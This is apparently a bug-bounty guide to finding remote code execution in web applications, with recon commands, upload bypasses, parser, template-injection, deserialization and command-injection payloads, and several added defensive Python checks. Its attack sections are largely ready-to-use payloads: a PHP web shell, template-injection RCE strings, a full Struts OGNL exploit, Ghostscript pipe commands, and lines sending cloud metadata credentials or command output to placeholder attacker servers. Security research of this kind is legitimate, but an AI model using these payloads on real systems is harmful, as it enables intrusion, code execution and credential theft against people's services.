"RCE is not a bug class - it's an impact. There are literally 1001 ways to achieve it." - Bugcrowd Research Team


Table of Contents

  1. Recon & Fingerprinting
  2. Attack Surface Mapping
  3. File Upload Vulnerabilities
  4. Parser Exploits: Image & Document Converters
  5. Server-Side Template Injection (SSTI)
  6. Deserialization Attacks
  7. Command Injection
  8. XML External Entity (XXE)
  9. Server-Side Request Forgery (SSRF) → RCE
  10. SQL Injection → RCE
  11. Known CVEs & Framework-Specific RCEs
  12. Notable HackerOne Disclosed Reports
  13. Tools & Wordlists
  14. Reporting Tips

1. Recon & Fingerprinting

Before hunting for RCE, understand the attack surface. Technology fingerprinting is the foundation of every RCE hunt.

1.1 Passive Recon

  • Shodan/Censys/FOFA - surface exposed services, banners, and versions
  • Google Dorking
    site:target.com filetype:php inurl:upload
    site:target.com inurl:admin intitle:"index of"
    site:target.com "Powered by" (struts|rails|django|laravel)
    site:hackerone.com/reports "RCE" "target.com"
    inurl:"/wp-content/plugins/" site:target.com
    
  • Wayback Machine / Archive.org - find old endpoints, params, and tech stacks
  • GitHub Dorking
    org:target "api_key" OR "SECRET_KEY" OR "password"
    org:target filename:.env
    org:target "internal" filename:config.yml
    

1.2 Active Fingerprinting

  • Wappalyzer - browser extension for tech stack detection (wappalyzer.com)
  • WhatWeb - whatweb https://target.com
  • Nuclei - CVE-aware scanner with massive template library
    nuclei -u https://target.com -t cves/ -t exposed-panels/ -t technologies/

  • Nmap - service and version scanning
    nmap -sV -sC -p- target.com --open

  • httpx - fast HTTP probing
    httpx -l subdomains.txt -tech-detect -status-code -title
    

1.3 Subdomain & Endpoint Enumeration

  • Amass / Subfinder / Assetfinder - subdomain discovery
  • ffuf / dirsearch / feroxbuster - directory and endpoint fuzzing
    ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://target.com/FUZZ

  • ParamSpider / Arjun - hidden parameter discovery
  • GAU (getallurls) - harvest URLs from Wayback, Common Crawl, OTX

2. Attack Surface Mapping

Map every input to the application. Every parameter, header, file, and API endpoint is a potential entry point.

2.1 Input Vectors to Target

Vector              | Examples                             | RCE Potential
--------------------|--------------------------------------|--------------
File upload         | Profile picture, PDF export, import  | HIGH
URL/path parameters | ?file=, ?template=, ?page=           | HIGH
HTTP headers        | X-Forwarded-For, User-Agent, Cookie  | MEDIUM
JSON/XML bodies     | API request bodies                   | HIGH
GraphQL queries     | query { user(id: "...") }            | MEDIUM
WebSocket messages  | Real-time chat, feeds                | MEDIUM
Email inputs        | Contact forms, invitations           | LOW-MEDIUM

2.2 Technology-Specific Attack Mapping

Once you've identified the stack, search for known vulnerabilities:

[CMS/Framework] + [version] + "RCE" OR "remote code execution" site:github.com OR site:exploit-db.com
[Tech] + CVE + exploit site:packetstormsecurity.com

3. File Upload Vulnerabilities

File uploads are one of the highest-yield RCE vectors in bug bounty programs.

3.1 Basic Bypass Techniques

Extension Bypass

webshell.php → webshell.php5, .php7, .phtml, .pht, .phps
webshell.php → webshell.PHP (case sensitivity bypass)
webshell.php → webshell.php.jpg (double extension)
webshell.php → webshell.php%00.jpg (null byte injection)
webshell.php → webshell.php;.jpg (semicolon bypass - IIS)
webshell.php → webshell.php::$DATA (NTFS alternate data stream - Windows)

MIME Type Bypass

  • Change Content-Type: application/x-php → Content-Type: image/jpeg in Burp
  • Magic bytes trick: prepend valid image magic bytes before PHP code
    GIF89a; <?php system($_GET['cmd']); ?>
    

Content-Disposition Bypass

  • Rename via intercepting the multipart filename parameter
  • Use ../ in filename for path traversal to webroot

3.2 Execution Conditions

The file must be:

  1. Stored in a web-accessible directory
  2. Executed by the server (not just served statically)
  3. Or passed to a vulnerable processing library
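Those three conditions are the ones a defender breaks. The following Python check is an added example written for this page, not code from the original or from any program it cites; it rejects every filename trick listed in 3.1 and then removes conditions 1 and 2 by storing the file under a server-chosen name outside the web root. UPLOAD_ROOT, ALLOWED_TYPES and SCRIPT_EXTENSIONS are assumed values for the example.

```python
import os
import re
import secrets

# Assumed for this example: uploads live outside the web root and are served back
# through a handler that sets a fixed Content-Type, so nothing stored here is ever
# handed to PHP, ASP.NET or a CGI handler for execution.
UPLOAD_ROOT = "/srv/app/uploads"

# Allowed extensions mapped to the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "jpg":  [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "gif":  [b"GIF87a", b"GIF89a"],
    "pdf":  [b"%PDF-"],
}

# Extensions that must not appear anywhere in the name chain; this catches
# webshell.php.jpg, webshell.phtml, .htaccess and the other 3.1 variants.
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "pht", "phps", "phar",
    "asp", "aspx", "asa", "ashx", "asmx", "jsp", "jspx", "cfm", "cgi",
    "pl", "py", "sh", "htaccess", "config",
}

# Strict character set: rejects ';' and ':' (IIS and NTFS ::$DATA tricks), '%',
# spaces, quotes and anything a shell or URL parser might reinterpret.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def validate_upload(filename: str, content: bytes):
    """Return (accepted, detail); on success detail is the server-chosen storage path.

    The client's Content-Type header is deliberately not a parameter: it is
    attacker-controlled and carries no information the bytes do not.
    """
    # NUL bytes: some stacks truncate at \x00, turning x.php\x00.jpg into x.php.
    if "\x00" in filename:
        return False, "NUL byte in filename"

    # Path separators: the name must never steer where the file lands.
    if "/" in filename or "\\" in filename:
        return False, "path separator in filename"

    if not SAFE_NAME.match(filename):
        return False, "illegal character in filename"

    segments = filename.lower().split(".")
    if len(segments) < 2 or not segments[-1]:
        return False, "missing extension"

    # Every extension in the chain is checked, not only the last one.
    if any(seg in SCRIPT_EXTENSIONS for seg in segments[1:]):
        return False, "server-side script extension present"

    ext = segments[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not allowed"

    # Magic bytes must agree with the extension. Note what this does NOT do:
    # a GIF89a header followed by PHP source still passes, which is why the
    # storage location, not this check, is the real execution barrier.
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"

    # The client never chooses the stored name.
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, os.path.join(UPLOAD_ROOT, stored_name)
```

The last case worth trying is the GIF89a polyglot from 3.1: it passes, because a magic-byte check cannot see what follows the header. That is why conditions 1 and 2 (location and execution), not the content check, decide whether an upload becomes RCE; re-encoding the image through a hardened converter is the usual extra layer.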

3.3 Notable HackerOne Reports

3.4 Checklist

  • [ ] Try all common server-side extensions (.php, .asp, .aspx, .jsp, .cfm)
  • [ ] Test MIME type bypass via Burp Suite
  • [ ] Check magic bytes bypass (prepend GIF89a; or PNG header)
  • [ ] Test null byte in filename
  • [ ] Test double extension (.jpg.php)
  • [ ] Upload SVG file to check for XXE/SSRF
  • [ ] Upload PDF/PS/EPS to trigger Ghostscript
  • [ ] Upload .htaccess to redefine execution rules (Apache only)
  • [ ] Check if uploaded files are stored in web-accessible path
  • [ ] Test path traversal in filename field

4. Parser Exploits: Image & Document Converters

Document and image parsers are a goldmine for RCE. When an application processes images, PDFs, or documents server-side using popular libraries, the libraries themselves may be vulnerable.

4.1 ImageMagick / ImageTragick

ImageMagick is used by millions of applications for image processing. Multiple critical vulnerabilities have been found over the years.

ImageTragick (CVE-2016-3714) - The Classic

The original ImageTragick vulnerability allowed code execution via crafted MVG/SVG files. Discovered by Stewie and Nikolay Ermishkin of the Mail.Ru Security Team in 2016.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops)|id'
pop graphic-context

Reference: https://imagetragick.com
GitHub Exploit Collection: https://github.com/barrracud4/image-upload-exploits

MSL Injection (CVE-2022-44268, CVE-2022-44267) - 2023

Arbitrary file read via specially crafted PNG. An attacker-controlled PNG causes ImageMagick to embed the contents of a local file into the converted image.

# Craft a PNG that reads /etc/passwd when processed
convert exploit.png output.png
# Output image contains /etc/passwd content

CVE-2024-33869 - Path Traversal & Command Execution

Affects recent versions of ImageMagick; allows path traversal leading to potential command execution.

Key Payloads

# Test for SSRF via DNS callback (ImageTragick)
push graphic-context
viewbox 0 0 640 480
fill 'url(http://BURPCOLLABORATOR.com/test)'
pop graphic-context

# Test for RCE via SVG
<image authenticate='ff" `id > /tmp/pwned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
</image>

# GhostScript delegation bypass (via EPS disguised as JPEG)
%!PS
userdict /setpagedevice undef
legal { null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

HackerOne Reports

  • HackerOne itself - RCE in Profile Picture Upload (ImageMagick). Profile picture processed with unpatched ImageMagick; MVG payload triggered RCE. https://hackerone.com/reports/135072

  • Semrush - RCE via Logo Upload + ImageMagick + Ghostscript. Logo upload endpoint passed files to unpatched ImageMagick; researcher Frans Rosén achieved RCE using a PostScript payload. https://hackerone.com/reports/403417

  • Pixiv/Booth - ImageTragick v2 via GhostScript. Shop header upload was passed to vulnerable ImageMagick; JPEG disguise triggered Ghostscript RCE. https://hackerone.com/reports/402362

  • Basecamp - RCE via Image Conversion (GhostScript). Image conversion pipeline called Ghostscript on attacker-supplied input. https://hackerone.com/reports/365271

  • Imgur - RCE via Command-Line Argument Injection (GraphicsMagick). The y parameter in /edit/process was injected into a gm convert call; GraphicsMagick's pipe-filename feature allowed command execution. https://hackerone.com/reports/212696

4.2 GhostScript

GhostScript is the PostScript/PDF interpreter used underneath ImageMagick for PS, EPS, and PDF processing.

The Vulnerability Pattern

When policy.xml does not explicitly disable EPS, PS, PDF, and XPS coders, ImageMagick delegates these file types to GhostScript. If GhostScript runs without the -dSAFER switch, the %pipe% command can be used to execute shell commands.
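A reviewer can verify that pattern directly against the policy file. The check below is an added example, not code from the page or from ImageMagick; it parses a policy.xml and lists which Ghostscript-delegated coders remain enabled. The three policy documents are constructed samples, and the coder set (PS, PS2, PS3, EPS, PDF, XPS) is the set hardened distribution policies disable, assumed here.

```python
import xml.etree.ElementTree as ET

# Coders ImageMagick hands to Ghostscript. Assumed set for this example.
DELEGATED_CODERS = {"PS", "PS2", "PS3", "EPS", "PDF", "XPS"}


def _names_in_pattern(pattern: str):
    """Expand 'PS' or ImageMagick's brace list '{PS,PDF}' into upper-case coder names."""
    return {name.strip().upper() for name in pattern.strip().strip("{}").split(",") if name.strip()}


def audit_policy(policy_xml: str):
    """Return the Ghostscript-delegated coders the policy leaves enabled (sorted).

    Two configurations count as disabling a coder:
      <policy domain="coder" rights="none" pattern="PS"/>        (per coder, or a {..} list, or *)
      <policy domain="delegate" rights="none" pattern="gs"/>     (blocks the gs delegate itself)
    Anything else, including a rights="read" entry, leaves the coder reachable.
    """
    root = ET.fromstring(policy_xml)
    disabled = set()
    for pol in root.iter("policy"):
        if pol.get("rights", "").strip().lower() != "none":
            continue
        domain = pol.get("domain", "").lower()
        pattern = pol.get("pattern", "")
        if domain == "coder":
            names = _names_in_pattern(pattern)
            disabled |= DELEGATED_CODERS if names == {"*"} else names
        elif domain == "delegate" and pattern.strip().lower() == "gs":
            disabled |= DELEGATED_CODERS
    return sorted(DELEGATED_CODERS - disabled)


# Constructed samples. The first only blocks MVG (the ImageTragick vector) and a
# rights="read" PDF entry that does nothing; the second is what a hardened file
# looks like; the third blocks the gs delegate instead of the individual coders.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="read" pattern="PDF"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="delegate" rights="none" pattern="HTTPS"/>
</policymap>"""

DELEGATE_ONLY_POLICY = """<policymap>
  <policy domain="delegate" rights="none" pattern="gs"/>
</policymap>"""
```

Run it against /etc/ImageMagick-6/policy.xml or /etc/ImageMagick-7/policy.xml on the host that does the conversion; an empty result means every PostScript-family input is refused before Ghostscript is ever invoked, which also neutralises the -dSAFER bypasses described below.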

CVE-2019-14811 (Ghostscript < 9.50)

Specially crafted Postscript files disable sandbox protections (-dSAFER bypass) and allow arbitrary file system access or command execution.

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Testing Strategy

  1. Upload a file with .ps, .eps, .pdf, or .jpg extension but with PostScript content (magic bytes: %!PS)
  2. Monitor DNS callback or out-of-band for execution confirmation
  3. Try: %pipe%nslookup YOURBURPCOLLAB.com

Deep Dive: HackerOne Blog - ImageMagick RCE with Frans Rosén
CVE reference: CVE-2019-14811

4.3 LibreOffice / OpenDocument Converters

Many applications (HR platforms, report builders, data importers) allow upload of .docx, .xlsx, .odt files and convert them server-side using LibreOffice in headless mode.

Macros & Event Triggers

LibreOffice supports embedded macros. If the conversion is done without --headless --infilter="writer_pdf_Export" and safe options, macros can fire.

# Malicious ODF with macro auto-execution
# Macro fires on document open event
Sub AutoOpen()
  Shell "curl http://YOURSERVER.com/rce"
End Sub

CVE-2018-16858 - LibreOffice Path Traversal → RCE

A specially crafted .odt file containing a relative path in a script URL could execute Python scripts.

DDE (Dynamic Data Exchange) in Office Documents

Inject DDE fields into .docx/.xlsx:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}

Resource: PayloadsAllTheThings β€” Office Macros

4.4 PDF Processing (pdftotext, wkhtmltopdf, Puppeteer/Headless Chrome)

wkhtmltopdf SSRF → RCE

If the application generates PDFs from user-supplied HTML using wkhtmltopdf, internal SSRF is almost guaranteed.

<iframe src="file:///etc/passwd"></iframe>
<script>document.write(location.href)</script>

This can read internal files or hit internal services, and chain to RCE if internal services are vulnerable (e.g., metadata API in cloud environments).

Headless Browser SSRF

Puppeteer, Playwright, and PhantomJS-based PDF generators are subject to the same SSRF issues.

// In user-supplied HTML processed by headless Chrome
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
  .then(r => r.text())
  .then(d => fetch('https://YOURSERVER.com/?data=' + btoa(d)))
</script>

pdftotext / poppler

Parsing vulnerabilities have been found in poppler; test with malformed PDF files generated by fuzzing tools.

4.5 FFmpeg

Many platforms process video uploads using FFmpeg.

SSRF via HLS Playlist (CVE-2016-1897 / CVE-2016-1898)

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://YOURSERVER.com/ssrf
#EXT-X-ENDLIST

An attacker-controlled .m3u8 playlist causes FFmpeg to make requests to arbitrary URLs, enabling SSRF and potentially reading local files.

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
file:///etc/passwd
#EXT-X-ENDLIST

Resource: Hacktricks - FFmpeg

4.6 Checklist: Parser Exploits

  • [ ] Identify what processing library the application uses (check error messages, response headers, timing)
  • [ ] Upload a crafted PNG with embedded payload to test ImageMagick
  • [ ] Upload a .eps/.ps file disguised as JPEG to test GhostScript delegation
  • [ ] Upload .svg with external entity to test for SSRF/XXE
  • [ ] Upload .docx/.odt with macro to test LibreOffice
  • [ ] If PDF generation: embed <iframe src="file:///etc/passwd"> in user-controlled content
  • [ ] If video upload: supply a malicious .m3u8 HLS playlist
  • [ ] Check for GIF memory leak to confirm ImageMagick version
  • [ ] Test GraphicsMagick's pipe-filename feature via command-line injection

5. Server-Side Template Injection (SSTI)

SSTI occurs when user input is embedded directly into a server-side template string instead of being passed to the template as data. It frequently leads to RCE.

5.1 Detection

Try these probes in all input fields, URL parameters, and headers:

{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
${{7*7}}
{{7*'7'}}
${{"freemarker"?upper_case}}

If you see 49 reflected back, you have SSTI. Use the decision tree at https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection to identify the template engine.
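From the defender's side, the same probes are what a WAF rule or a log review looks for. The scanner below is an added example, not code from the page or from tplmap; it URL-decodes each request line, matches the five expression syntaxes listed above, and only raises an alert when the expression body looks like a probe or an exploitation primitive (arithmetic, dunder attributes, reflection or process calls), so a user who literally types {{name}} into a search box is not flagged. The log lines are constructed samples and the engine labels are hints following the decision tree in 5.3, not identifications.

```python
import re
import urllib.parse

# One pattern per template-expression syntax from 5.1, labelled with the engine
# family that uses it. The label is a triage hint, not an identification.
PROBE_SYNTAXES = [
    (re.compile(r"\{\{.*?\}\}", re.S), "Jinja2 / Twig / Pebble / Go text-template"),
    (re.compile(r"\$\{\{?.*?\}\}?"),   "FreeMarker / Velocity / Spring EL"),
    (re.compile(r"<%=.*?%>", re.S),    "ERB / EJS / JSP"),
    (re.compile(r"#\{.*?\}"),          "Ruby ERB / Thymeleaf / Velocity"),
    (re.compile(r"\*\{.*?\}"),         "Thymeleaf"),
]

# What sits inside the braces when a request is a probe or an exploit attempt
# rather than a user quoting template syntax.
SUSPICIOUS_BODY = re.compile(
    r"\d+\s*\*\s*['\"]?\d+"            # arithmetic probes: 7*7, 7*'7'
    r"|__[a-z]+__"                      # dunder walks: __class__, __globals__, __import__
    r"|\?new\(\)"                       # FreeMarker ?new()
    r"|\b(?:forName|getRuntime|exec|popen|system|passthru|child_process|"
    r"Execute|registerUndefinedFilterCallback|mainModule)\b",
    re.I,
)


def scan_value(value: str):
    """Return [(matched_expression, engine_hint), ...] for every probe-like expression."""
    hits = []
    for syntax, hint in PROBE_SYNTAXES:
        for match in syntax.finditer(value):
            if SUSPICIOUS_BODY.search(match.group(0)):
                hits.append((match.group(0), hint))
    return hits


def scan_access_log(lines):
    """URL-decode each line (probes usually arrive percent-encoded) and scan it."""
    alerts = []
    for line in lines:
        for expression, hint in scan_value(urllib.parse.unquote(line)):
            alerts.append({"line": line, "expression": expression, "engine_hint": hint})
    return alerts


# Constructed sample log: lines 2 to 4 are probes, line 5 is a benign false-positive trap.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /search?q=shoes HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /profile?name=%24%7B7*7%7D HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "{{request|attr(\'__class__\')}}"',
    '198.51.100.2 - - "GET /docs?q=use+%7B%7Bname%7D%7D+in+templates HTTP/1.1" 200 "Mozilla/5.0"',
]
```

The User-Agent on line 4 is the reason to scan headers as well as the query string: the page's detection list names headers as an injection point, and a probe there never shows up in a URL-only rule.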

5.2 Engine-Specific RCE Payloads

Jinja2 (Python/Flask)

# Basic RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

# Without quotes (filter bypass)
{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')() }}

# Alternative via MRO
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip() }}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}

FreeMarker (Java)

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Velocity (Java)

#set($rt = $class.forName('java.lang.Runtime'))
#set($chr = $class.forName('java.lang.Character'))
#set($str = $class.forName('java.lang.String'))
#set($ex = $rt.getRuntime().exec('id'))
$ex.waitFor()
#set($out = $ex.inputStream)
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

Smarty (PHP)

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Pebble (Java)

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke((1).TYPE.forName('java.lang.Runtime').methods[5].invoke(null),cmd) %}

EJS (Node.js)

<%= global.process.mainModule.require('child_process').execSync('id').toString() %>

Go (text/template)

{{.System "id"}}  // requires object with System method

5.3 SSTI Decision Tree (Quick Reference)

Input reflects? → Try {{7*7}}
  → 49? → Jinja2/Twig
    → {{7*'7'}} = 7777777? → Jinja2 (Python)
    → {{7*'7'}} = 49? → Twig (PHP)
  → ${7*7} = 49? → Freemarker/Velocity/Spring EL
  → #{7*7} = 49? → Ruby ERB / Thymeleaf
  → No reflection → Blind SSTI (use sleep payloads)

5.4 Resources


6. Deserialization Attacks

Deserialization vulnerabilities arise when attacker-controlled serialized objects are deserialized by the server, allowing execution of arbitrary code through "gadget chains."

6.1 Java Deserialization

Identifying Java Deserialization

Look for:

  • Base64-encoded blobs starting with rO0AB (Java serialized object magic bytes ACED 0005)
  • Content-Type: application/x-java-serialized-object
  • Libraries: Apache Commons Collections, Spring Framework, XStream, Jackson

Exploitation with ysoserial

ysoserial generates gadget-chain payloads for various Java libraries:

# Generate payload for Commons Collections 3
java -jar ysoserial.jar CommonsCollections1 'curl http://YOURSERVER.com/pwned' | base64 -w 0

# Common gadget chains:
# CommonsCollections1-7, Spring1-2, Hibernate1-2, BeanShell1, Groovy1

CVE-2025-55182 - React2Shell (CVSS 10.0) - 2025

The most significant deserialization RCE of recent years. Affects React Server Components (versions 19.0–19.2.0) and Next.js. An unauthenticated attacker sends a crafted HTTP POST request to any RSC endpoint; the React "Flight" protocol deserializes attacker-controlled data without validation, leading to arbitrary JavaScript execution on the Node.js server.

  • Disclosed: December 3, 2025
  • CVSS Score: 10.0 (Maximum)
  • Patched versions: React 19.0.1, 19.1.2, 19.2.1; Next.js latest
  • Exploited in wild: Yes - by nation-state actors (China-nexus) and cybercriminals
  • HackerOne: #1 most exploited CVE on the platform after disclosure
  • References: Rapid7 ETR | Google GTIG | HackerOne Blog

# Detection: POST request to RSC endpoint with crafted Flight payload
# Check for next-action or rsc-action-id headers
curl -X POST https://target.com/api/action \
  -H "next-action: [crafted-id]" \
  -d '[malicious_flight_payload]'

Apache Struts (CVE-2017-5638, CVE-2018-11776)

OGNL injection via Content-Type header (S2-045) or URL parameters.

Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))).(#ros)}

6.2 PHP Deserialization

PHP's unserialize() function can trigger magic methods (__wakeup, __destruct, __toString) that form gadget chains.

Identifying PHP Deserialization

Look for:

  • Cookies or parameters containing O: (PHP object notation)
  • Base64-decoded values like: O:8:"stdClass":1:{s:4:"data";s:5:"hello";}
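The indicators in 6.1 and 6.2 can be turned into an inspection step that runs before any deserializer is reached. The Python below is an added example, not code from the page or from ysoserial/PHPGGC: it base64-decodes a value when it strictly is base64, walks a Java stream for TC_OBJECT/TC_CLASSDESC class names, parses PHP O:len:"class" records, and compares the result with an allowlist, which is the same decision an ObjectInputFilter or an unserialize allowed_classes list makes. The sample values and allowlists are constructed; the Java streams are truncated stubs, not complete objects, and App\Legacy\Importer is a hypothetical class.

```python
import base64
import re
import struct

JAVA_MAGIC = b"\xac\xed\x00\x05"           # base64-encodes to the "rO0AB" prefix
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

# Allowlists stand in for what an ObjectInputFilter (JEP 290) or
# unserialize($data, ['allowed_classes' => [...]]) would enforce. Assumed for the example.
JAVA_ALLOWED = {"java.util.HashMap", "java.util.ArrayList", "java.lang.String"}
PHP_ALLOWED = {"stdClass"}

JAVA_CLASS_NAME = re.compile(rb"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*")
PHP_OBJECT = re.compile(rb'O:(\d+):"([^"]*)"')


def maybe_base64(blob):
    """Decode strict base64 if that is what the value is; otherwise return the raw bytes."""
    if isinstance(blob, str):
        blob = blob.encode()
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:                         # binascii.Error is a ValueError
        return blob


def java_class_names(data: bytes):
    """Class names from TC_OBJECT TC_CLASSDESC <UTF name> records, or None if not a Java stream."""
    if not data.startswith(JAVA_MAGIC):
        return None
    names, i = [], len(JAVA_MAGIC)
    while i + 4 <= len(data):
        if data[i] == TC_OBJECT and data[i + 1] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 2:i + 4])
            candidate = data[i + 4:i + 4 + length]
            if len(candidate) == length and JAVA_CLASS_NAME.fullmatch(candidate):
                names.append(candidate.decode())
                i += 4 + length
                continue
        i += 1
    return names


def php_class_names(data: bytes):
    """Class names from O:<len>:"<name>" records whose length field matches the name, or None."""
    names = [name.decode(errors="replace")
             for length, name in PHP_OBJECT.findall(data) if int(length) == len(name)]
    return names or None


def inspect_untrusted(blob):
    """Classify a cookie or parameter value as (format, classes, verdict)."""
    data = maybe_base64(blob)
    for fmt, extractor, allowed in (("java", java_class_names, JAVA_ALLOWED),
                                    ("php", php_class_names, PHP_ALLOWED)):
        classes = extractor(data)
        if classes is None:
            continue
        if not classes:
            return fmt, [], "reject: no class descriptor found"
        denied = sorted(set(classes) - allowed)
        return fmt, classes, ("reject: " + ", ".join(denied)) if denied else "allow"
    return "none", [], "allow"


def _java_stream(class_name: str) -> bytes:
    """Constructed stub: magic + one class descriptor header, zero-padded. Not a complete stream."""
    name = class_name.encode()
    return JAVA_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(name)) + name + b"\x00" * 11


# Constructed sample values as they would appear in a cookie or POST body.
SAMPLE_JAVA_OK = base64.b64encode(_java_stream("java.util.HashMap")).decode()
SAMPLE_JAVA_BAD = base64.b64encode(_java_stream("org.apache.commons.collections.functors.InvokerTransformer")).decode()
SAMPLE_JAVA_EMPTY = base64.b64encode(JAVA_MAGIC).decode()
SAMPLE_PHP_OK = 'O:8:"stdClass":1:{s:4:"data";s:5:"hello";}'
SAMPLE_PHP_BAD = 'O:19:"App\\Legacy\\Importer":0:{}'   # hypothetical application class
```

The allowlist, not a denylist of known gadget classes, is the part that matters: a denylist is only as current as the last gadget-chain publication, whereas an allowlist of the handful of classes the application actually exchanges rejects every chain, known or not.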

PHPGGC - PHP Gadget Chain Generator

# List available chains
phpggc -l

# Generate payload for Laravel/Monolog
phpggc Laravel/RCE1 system id | base64

PHPGGC

CVE-2024-34102 - Magento XXE + PHP Filter Chain → RCE (CosmicString)

A nested deserialization vulnerability in Magento's XML processing, chained with PHP filter chain research (CVE-2024-2961) by Charles Fol, achieves RCE through an XXE injection.

Reference: Assetnote Research

6.3 .NET Deserialization

Tools: ysoserial.net, ExploitRemotingService

Vulnerable classes: BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter

6.4 Node.js Prototype Pollution β†’ RCE

Prototype pollution in Node.js applications can chain into RCE through certain template engines and spawn configurations.

// Example prototype pollution payload → RCE via child_process
{"__proto__": {"shell": "node", "NODE_OPTIONS": "--inspect=YOURSERVER:4444"}}

Blog: Prototype Pollution to RCE


7. Command Injection

Command injection occurs when user input is concatenated directly into OS commands.

7.1 Identifying Injection Points

Look for functionality that:

  • Pings a host (network tools)
  • Resolves a domain
  • Converts/processes files via system commands
  • Sends emails via sendmail
  • Generates reports/exports
  • Has a "test connection" feature (databases, APIs)

7.2 Payloads

# Basic command separators
; id
| id
|| id
& id
&& id
`id`
$(id)

# Blind out-of-band (use Burp Collaborator or interactsh)
; nslookup YOURBURP.com
; curl http://YOURSERVER.com/$(id)
| wget http://YOURSERVER.com?q=$(whoami)

# Filter bypass
# Whitespace bypass
{id}
$IFS$()id

# Quote bypass
i""d
i''d

# Encoding
%0aid   (newline)
%0did   (carriage return)

7.3 Argument Injection

When you can't inject separators but control a command-line argument:

# curl argument injection
--output /var/www/html/shell.php
-o /var/www/html/shell.php

# git clone argument injection
--upload-pack=touch${IFS}/tmp/pwned

# ImageMagick command injection (label parameter)
convert -label '@/etc/passwd' input.png output.png

# FFmpeg -i argument
-i 'http://YOURSERVER.com/malicious.m3u8'
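The fix for both 7.2 and 7.3 is the same: never build a command string, validate the one data element, and pass an argv list. The Python below is an added example, not the page's code; ping stands in for the network-tool feature listed in 7.1, and the hostname grammar is the example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)


def validate_target(host: str) -> str:
    """Return host if it is an IP literal or a hostname; raise ValueError otherwise.

    The grammar admits no space, quote, backtick, $, ;, |, &, %, or leading '-', so
    none of the separators in 7.2 or the flags in 7.3 survive it.
    """
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if not HOSTNAME.match(host):
        raise ValueError(f"not a hostname or IP literal: {host!r}")
    return host


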